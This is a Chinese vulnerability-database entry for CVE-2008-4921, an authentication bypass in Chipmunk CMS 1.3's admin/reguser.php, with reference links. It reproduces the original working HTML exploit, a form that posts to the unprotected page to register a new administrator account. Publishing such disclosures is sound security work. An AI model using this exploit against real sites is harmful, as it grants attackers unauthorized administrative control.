Chipmunk Scripts Chipmunk CMS 'reguser.php'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184775 漏洞类型 权限许可和访问控制
发布时间 2008-11-04 更新时间 2008-11-04
CVE编号 CVE-2008-4921 CNNVD-ID CNNVD-200811-059
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/84734
https://cxsecurity.com/issue/WLB-2008110017
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200811-059
|漏洞详情
ChipmunkCMS1.3版本中的board/admin/reguser.php允许远程攻击者借助一个直接请求,绕过身份认证和获得管理员特权。
|漏洞EXP
# Chipmunk CMS (reguser.php) Add Admin Exploit (html)
# url: http://www.chipmunk-scripts.com/chipmunkcms/chipmunkcms.zip
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

<html>
<head>
<title> Chipmunk CMS (reguser.php) Add Admin Exploit (html)</title>
</head>
<body>
<form action=http://xxxxxxx/board/admin/reguser.php method=post>
Username:<br>
<input type=text name='username' value='JosS' size="20"><br>
Password:<br>
<input type=text name='password' value='h4x0rz' size="20"><br>
<input type=hidden name='pass2' value='h4x0rz' size="20"><br>
Email:<br>
<input type=text name='email' value='sys-project[at]hotmail.com' size="20"><br><p>
<input type=submit name='submit' value='send'><br>
</form>
</body>
</html>

Hack0wn :D

|受影响的产品
Chipmunk Scripts Chipmunk Cms 1.3
|参考资料

来源:XF
名称:chipmunkcms-reguser-security-bypass(46259)
链接:http://xforce.iss.net/xforce/xfdb/46259
来源:MILW0RM
名称:6959
链接:http://www.milw0rm.com/exploits/6959
来源:SREASON
名称:4559
链接:http://securityreason.com/securityalert/4559
来源:SECUNIA
名称:32476
链接:http://secunia.com/advisories/32476
来源:OSVDB
名称:49494
链接:http://osvdb.org/49494